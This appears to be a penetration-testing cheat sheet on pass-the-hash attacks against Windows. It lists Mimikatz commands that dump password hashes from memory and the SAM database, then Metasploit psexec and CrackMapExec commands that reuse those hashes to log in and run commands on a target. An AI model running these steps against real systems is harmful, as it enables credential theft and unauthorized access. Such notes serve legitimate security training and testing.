🔑Pass-The-Hash Attacks

Pass-The-Hash

Pass-the-hash is an exploitation technique that involves capturing or harvesting NTLM hashes or clear-text passwords and utilizing them to authenticate with the target legitimately.
We can use multiple tools to facilitate a Pass-The-Hash attack:
- Metasploit PsExec module
- Crackmapexec
This technique will allow us to obtain access to the target system via legitimate credentials as opposed to obtaining access via service exploitation.

Objective: Obtain LM and NTLM hash values of user accounts from the target server.

Tool: Mimikatz

Command:

mimikatz.exe > privilege::debug
mimikatz.exe > sekurlsa::logonpasswords
mimikatz.exe > lsadump::sam

Description: Use Mimikatz to dump user password hashes from the SAM database and extract hashes from memory.

Objective: Exploit the target server using the PsExec module with the obtained hash values.

Tool: Metasploit

Module: exploit/windows/smb/psexec

Commands:

Start Metasploit Console:

msfconsole

Select PsExec Module:

use exploit/windows/smb/psexec

Configure Module Parameters:

set RHOSTS <target_ip>
set SMBUser <username>
set SMBPass <LM_hash:NTLM_hash>

Run the Exploit:

exploit

If Exploit Fails, Set Target Option:

set target Native\ upload
exploit

Description: Use the PsExec module to execute a pass-the-hash attack with the LM and NTLM hashes to gain access to the target server.

Objective: Perform the pass-the-hash attack using CrackMapExec as an alternative method.

Tool: CrackMapExec

Commands:

Execute Pass-the-Hash Attack:

crackmapexec smb <target_ip> -u <username> -H <pass_hash>

Execute Commands on the Server:

crackmapexec smb <target_ip> -u <username> -H <pass_hash> -x "Cmd"

Description: Use CrackMapExec to perform the pass-the-hash attack and execute commands on the target server.

Hacker's Mantra:Hackers are seen as shadowy figures with superhuman powers that threaten civilization. - Mitch Kapor

Last updated 1 year ago